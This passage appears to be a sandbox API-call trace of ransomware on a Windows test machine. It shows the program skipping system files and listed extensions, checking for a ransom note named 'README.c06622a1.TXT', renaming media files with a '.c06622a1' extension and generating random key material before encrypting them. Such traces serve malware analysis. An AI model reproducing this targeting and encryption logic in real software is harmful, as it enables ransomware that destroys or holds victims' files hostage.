(_String="hlp") returned 0x3 [0168.198] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0168.198] wcslen (_String="icl") returned 0x3 [0168.198] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0168.198] wcslen (_String="icns") returned 0x4 [0168.198] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0168.198] wcslen (_String="ico") returned 0x3 [0168.198] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0168.198] wcslen (_String="ics") returned 0x3 [0168.198] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0168.199] wcslen (_String="idx") returned 0x3 [0168.199] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0168.199] wcslen (_String="ldf") returned 0x3 [0168.199] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0168.199] wcslen (_String="lnk") returned 0x3 [0168.199] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0168.199] wcslen (_String="mod") returned 0x3 [0168.199] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0168.199] wcslen (_String="mpa") returned 0x3 [0168.199] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0168.199] wcslen (_String="msc") returned 0x3 [0168.199] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0168.199] wcslen (_String="msp") returned 0x3 [0168.199] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0168.199] wcslen (_String="msstyles") returned 0x8 [0168.199] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0168.199] wcslen (_String="msu") returned 0x3 [0168.199] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0168.199] wcslen (_String="nls") returned 0x3 [0168.199] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0168.199] wcslen (_String="nomedia") returned 0x7 [0168.199] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0168.199] wcslen (_String="ocx") returned 0x3 [0168.199] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0168.199] wcslen (_String="prf") returned 0x3 [0168.199] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0168.199] wcslen (_String="ps1") returned 0x3 [0168.199] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0168.199] wcslen (_String="rom") returned 0x3 [0168.199] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0168.199] wcslen (_String="rtp") returned 0x3 [0168.199] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0168.199] wcslen (_String="scr") returned 0x3 [0168.199] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0168.199] wcslen (_String="shs") returned 0x3 [0168.199] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0168.200] wcslen (_String="spl") returned 0x3 [0168.200] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0168.200] wcslen (_String="sys") returned 0x3 [0168.200] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0168.200] wcslen (_String="theme") returned 0x5 [0168.200] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0168.200] wcslen (_String="themepack") returned 0x9 [0168.200] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0168.200] wcslen (_String="wpx") returned 0x3 [0168.200] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0168.200] wcslen (_String="lock") returned 0x4 [0168.200] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0168.200] wcslen (_String="key") returned 0x3 [0168.200] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0168.200] wcslen (_String="hta") returned 0x3 [0168.200] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0168.200] wcslen (_String="msi") returned 0x3 [0168.200] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0168.200] wcslen (_String="pdb") returned 0x3 [0168.200] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0168.200] wcslen (_String="sqlite") returned 0x6 [0168.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.200] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.200] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.200] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.200] wcscpy (in: _Dest=0x32400d2, _Source="4o6tuvsKWxaerB.mkv" | out: _Dest="4o6tuvsKWxaerB.mkv") returned="4o6tuvsKWxaerB.mkv" [0168.200] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv", dwFileAttributes=0x80) returned 1 [0168.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4o6tuvskwxaerb.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0168.201] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.201] ReadFile (in: hFile=0x1f0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.202] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xe4786c9e [0168.202] RtlComputeCrc32 (PartialCrc=0x6c9e, Buffer=0x32e9a4, Length=0x80) returned 0xedcddaf7 [0168.202] RtlComputeCrc32 (PartialCrc=0xdaf7, Buffer=0x32e9a4, Length=0x80) returned 0x368bde91 [0168.202] RtlComputeCrc32 (PartialCrc=0xde91, Buffer=0x32e9a4, Length=0x80) returned 0x61a8867a [0168.202] RtlComputeCrc32 (PartialCrc=0x867a, Buffer=0x32e9a4, Length=0x80) returned 0x406e78a3 [0168.202] CloseHandle (hObject=0x1f0) returned 1 [0168.202] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.202] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv" [0168.202] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv") returned 0x4b [0168.202] wcscpy (in: _Dest=0x32500fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.202] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4o6tuvskwxaerb.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4o6tuvskwxaerb.mkv.c06622a1"), dwFlags=0x8) returned 1 [0168.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4o6tuvsKWxaerB.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4o6tuvskwxaerb.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0168.216] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.216] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54d328e4 [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ee11de9 [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x110df452 [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x496d8e9d [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x52970d91 [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a19c8f2 [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24baaa95 [0168.223] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1071a098 [0168.226] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0xe7ca7ba [0168.226] RtlComputeCrc32 (PartialCrc=0xa7ba, Buffer=0x2b70094, Length=0x80) returned 0xe554812e [0168.226] RtlComputeCrc32 (PartialCrc=0x812e, Buffer=0x2b70094, Length=0x80) returned 0x38d2f694 [0168.226] RtlComputeCrc32 (PartialCrc=0xf694, Buffer=0x2b70094, Length=0x80) returned 0x22ccbd7f [0168.226] RtlComputeCrc32 (PartialCrc=0xbd7f, Buffer=0x2b70094, Length=0x80) returned 0x586fb930 [0168.226] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0168.227] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.227] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.227] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52d56be0, ftCreationTime.dwHighDateTime=0x1d5e623, ftLastAccessTime.dwLowDateTime=0x585159b0, ftLastAccessTime.dwHighDateTime=0x1d5e238, ftLastWriteTime.dwLowDateTime=0x585159b0, ftLastWriteTime.dwHighDateTime=0x1d5e238, nFileSizeHigh=0x0, nFileSizeLow=0x5d38, dwReserved0=0x0, dwReserved1=0x0, cFileName="fQerDQH7U0mB3.swf", cAlternateFileName="FQERDQ~1.SWF")) returned 1 [0168.227] _wcsicmp (_Str1="fQerDQH7U0mB3.swf", _Str2="README.c06622a1.TXT") returned -12 [0168.227] wcsstr (_Str="fQerDQH7U0mB3.swf", _SubStr="README") returned 0x0 [0168.227] _wcsicmp (_Str1="autorun.inf", _Str2="fQerDQH7U0mB3.swf") returned -5 [0168.227] wcslen (_String="autorun.inf") returned 0xb [0168.227] _wcsicmp (_Str1="boot.ini", _Str2="fQerDQH7U0mB3.swf") returned -4 [0168.227] wcslen (_String="boot.ini") returned 0x8 [0168.227] _wcsicmp (_Str1="bootfont.bin", _Str2="fQerDQH7U0mB3.swf") returned -4 [0168.227] wcslen (_String="bootfont.bin") returned 0xc [0168.227] _wcsicmp (_Str1="bootsect.bak", _Str2="fQerDQH7U0mB3.swf") returned -4 [0168.227] wcslen (_String="bootsect.bak") returned 0xc [0168.227] _wcsicmp (_Str1="desktop.ini", _Str2="fQerDQH7U0mB3.swf") returned -2 [0168.227] wcslen (_String="desktop.ini") returned 0xb [0168.227] _wcsicmp (_Str1="iconcache.db", _Str2="fQerDQH7U0mB3.swf") returned 3 [0168.227] wcslen (_String="iconcache.db") returned 0xc [0168.227] _wcsicmp (_Str1="ntldr", _Str2="fQerDQH7U0mB3.swf") returned 8 [0168.227] wcslen (_String="ntldr") returned 0x5 [0168.227] _wcsicmp (_Str1="ntuser.dat", _Str2="fQerDQH7U0mB3.swf") returned 8 [0168.227] wcslen (_String="ntuser.dat") returned 0xa [0168.227] _wcsicmp (_Str1="ntuser.dat.log", _Str2="fQerDQH7U0mB3.swf") returned 8 [0168.227] wcslen (_String="ntuser.dat.log") returned 0xe [0168.227] _wcsicmp (_Str1="ntuser.ini", _Str2="fQerDQH7U0mB3.swf") returned 8 [0168.227] wcslen (_String="ntuser.ini") returned 0xa [0168.227] _wcsicmp (_Str1="thumbs.db", _Str2="fQerDQH7U0mB3.swf") returned 14 [0168.227] wcslen (_String="thumbs.db") returned 0x9 [0168.227] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0168.227] wcslen (_String="386") returned 0x3 [0168.227] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0168.227] wcslen (_String="adv") returned 0x3 [0168.227] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0168.227] wcslen (_String="ani") returned 0x3 [0168.228] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0168.228] wcslen (_String="bat") returned 0x3 [0168.228] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0168.228] wcslen (_String="bin") returned 0x3 [0168.228] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0168.228] wcslen (_String="cab") returned 0x3 [0168.228] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0168.228] wcslen (_String="cmd") returned 0x3 [0168.228] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0168.228] wcslen (_String="com") returned 0x3 [0168.228] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0168.228] wcslen (_String="cpl") returned 0x3 [0168.228] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0168.228] wcslen (_String="cur") returned 0x3 [0168.228] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0168.228] wcslen (_String="deskthemepack") returned 0xd [0168.228] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0168.228] wcslen (_String="diagcab") returned 0x7 [0168.228] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0168.228] wcslen (_String="diagcfg") returned 0x7 [0168.228] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0168.228] wcslen (_String="diagpkg") returned 0x7 [0168.228] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0168.228] wcslen (_String="dll") returned 0x3 [0168.228] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0168.228] wcslen (_String="drv") returned 0x3 [0168.228] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0168.228] wcslen (_String="exe") returned 0x3 [0168.228] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0168.228] wcslen (_String="hlp") returned 0x3 [0168.228] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0168.228] wcslen (_String="icl") returned 0x3 [0168.228] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0168.228] wcslen (_String="icns") returned 0x4 [0168.228] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0168.228] wcslen (_String="ico") returned 0x3 [0168.228] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0168.229] wcslen (_String="ics") returned 0x3 [0168.229] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0168.229] wcslen (_String="idx") returned 0x3 [0168.229] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0168.229] wcslen (_String="ldf") returned 0x3 [0168.229] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0168.229] wcslen (_String="lnk") returned 0x3 [0168.229] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0168.229] wcslen (_String="mod") returned 0x3 [0168.229] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0168.229] wcslen (_String="mpa") returned 0x3 [0168.229] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0168.229] wcslen (_String="msc") returned 0x3 [0168.229] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0168.229] wcslen (_String="msp") returned 0x3 [0168.229] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0168.229] wcslen (_String="msstyles") returned 0x8 [0168.229] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0168.229] wcslen (_String="msu") returned 0x3 [0168.229] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0168.229] wcslen (_String="nls") returned 0x3 [0168.229] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0168.229] wcslen (_String="nomedia") returned 0x7 [0168.229] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0168.229] wcslen (_String="ocx") returned 0x3 [0168.229] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0168.229] wcslen (_String="prf") returned 0x3 [0168.229] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0168.229] wcslen (_String="ps1") returned 0x3 [0168.229] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0168.229] wcslen (_String="rom") returned 0x3 [0168.229] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0168.229] wcslen (_String="rtp") returned 0x3 [0168.229] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0168.229] wcslen (_String="scr") returned 0x3 [0168.229] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0168.230] wcslen (_String="shs") returned 0x3 [0168.230] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0168.230] wcslen (_String="spl") returned 0x3 [0168.230] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0168.230] wcslen (_String="sys") returned 0x3 [0168.230] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0168.230] wcslen (_String="theme") returned 0x5 [0168.230] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0168.230] wcslen (_String="themepack") returned 0x9 [0168.230] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0168.230] wcslen (_String="wpx") returned 0x3 [0168.230] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0168.230] wcslen (_String="lock") returned 0x4 [0168.230] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0168.230] wcslen (_String="key") returned 0x3 [0168.230] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0168.230] wcslen (_String="hta") returned 0x3 [0168.230] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0168.230] wcslen (_String="msi") returned 0x3 [0168.230] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0168.230] wcslen (_String="pdb") returned 0x3 [0168.230] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0168.230] wcslen (_String="sqlite") returned 0x6 [0168.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.230] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.230] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.230] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.230] wcscpy (in: _Dest=0x32400d2, _Source="fQerDQH7U0mB3.swf" | out: _Dest="fQerDQH7U0mB3.swf") returned="fQerDQH7U0mB3.swf" [0168.230] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf", dwFileAttributes=0x80) returned 1 [0168.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\fqerdqh7u0mb3.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0168.231] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.231] ReadFile (in: hFile=0x1c4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.232] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xe5cdc5f2 [0168.232] RtlComputeCrc32 (PartialCrc=0xc5f2, Buffer=0x32e9a4, Length=0x80) returned 0xcf6c9b39 [0168.232] RtlComputeCrc32 (PartialCrc=0x9b39, Buffer=0x32e9a4, Length=0x80) returned 0xa6c67c8c [0168.232] RtlComputeCrc32 (PartialCrc=0x7c8c, Buffer=0x32e9a4, Length=0x80) returned 0x34dc7761 [0168.232] RtlComputeCrc32 (PartialCrc=0x7761, Buffer=0x32e9a4, Length=0x80) returned 0xfb53aa2b [0168.232] CloseHandle (hObject=0x1c4) returned 1 [0168.232] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.232] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf" [0168.232] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf") returned 0x4a [0168.232] wcscpy (in: _Dest=0x32500fc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.232] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\fqerdqh7u0mb3.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\fqerdqh7u0mb3.swf.c06622a1"), dwFlags=0x8) returned 1 [0168.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\fQerDQH7U0mB3.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\fqerdqh7u0mb3.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c4 [0168.235] CreateIoCompletionPort (FileHandle=0x1c4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.235] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3680020 [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x302c5dec [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4fcf4485 [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2fe9b4c2 [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a2fdeae [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6495d940 [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd4655f8 [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6243db03 [0168.243] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a2a7d0d [0168.246] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3680094, Length=0x80) returned 0xeb614f9a [0168.246] RtlComputeCrc32 (PartialCrc=0x4f9a, Buffer=0x3680094, Length=0x80) returned 0xfa485296 [0168.246] RtlComputeCrc32 (PartialCrc=0x5296, Buffer=0x3680094, Length=0x80) returned 0xfd0d90ef [0168.246] RtlComputeCrc32 (PartialCrc=0x90ef, Buffer=0x3680094, Length=0x80) returned 0x44535fd6 [0168.246] RtlComputeCrc32 (PartialCrc=0x5fd6, Buffer=0x3680094, Length=0x80) returned 0x881992f5 [0168.246] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3680020) returned 1 [0168.247] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.247] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.247] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3695d0, ftCreationTime.dwHighDateTime=0x1d5dcd2, ftLastAccessTime.dwLowDateTime=0x67eaab00, ftLastAccessTime.dwHighDateTime=0x1d5db40, ftLastWriteTime.dwLowDateTime=0x67eaab00, ftLastWriteTime.dwHighDateTime=0x1d5db40, nFileSizeHigh=0x0, nFileSizeLow=0x16ce9, dwReserved0=0x0, dwReserved1=0x0, cFileName="hJBPINTz49_rMgysH5.avi", cAlternateFileName="HJBPIN~1.AVI")) returned 1 [0168.247] _wcsicmp (_Str1="hJBPINTz49_rMgysH5.avi", _Str2="README.c06622a1.TXT") returned -10 [0168.247] wcsstr (_Str="hJBPINTz49_rMgysH5.avi", _SubStr="README") returned 0x0 [0168.247] _wcsicmp (_Str1="autorun.inf", _Str2="hJBPINTz49_rMgysH5.avi") returned -7 [0168.247] wcslen (_String="autorun.inf") returned 0xb [0168.247] _wcsicmp (_Str1="boot.ini", _Str2="hJBPINTz49_rMgysH5.avi") returned -6 [0168.247] wcslen (_String="boot.ini") returned 0x8 [0168.247] _wcsicmp (_Str1="bootfont.bin", _Str2="hJBPINTz49_rMgysH5.avi") returned -6 [0168.247] wcslen (_String="bootfont.bin") returned 0xc [0168.247] _wcsicmp (_Str1="bootsect.bak", _Str2="hJBPINTz49_rMgysH5.avi") returned -6 [0168.247] wcslen (_String="bootsect.bak") returned 0xc [0168.247] _wcsicmp (_Str1="desktop.ini", _Str2="hJBPINTz49_rMgysH5.avi") returned -4 [0168.247] wcslen (_String="desktop.ini") returned 0xb [0168.247] _wcsicmp (_Str1="iconcache.db", _Str2="hJBPINTz49_rMgysH5.avi") returned 1 [0168.247] wcslen (_String="iconcache.db") returned 0xc [0168.247] _wcsicmp (_Str1="ntldr", _Str2="hJBPINTz49_rMgysH5.avi") returned 6 [0168.247] wcslen (_String="ntldr") returned 0x5 [0168.247] _wcsicmp (_Str1="ntuser.dat", _Str2="hJBPINTz49_rMgysH5.avi") returned 6 [0168.247] wcslen (_String="ntuser.dat") returned 0xa [0168.247] _wcsicmp (_Str1="ntuser.dat.log", _Str2="hJBPINTz49_rMgysH5.avi") returned 6 [0168.247] wcslen (_String="ntuser.dat.log") returned 0xe [0168.247] _wcsicmp (_Str1="ntuser.ini", _Str2="hJBPINTz49_rMgysH5.avi") returned 6 [0168.247] wcslen 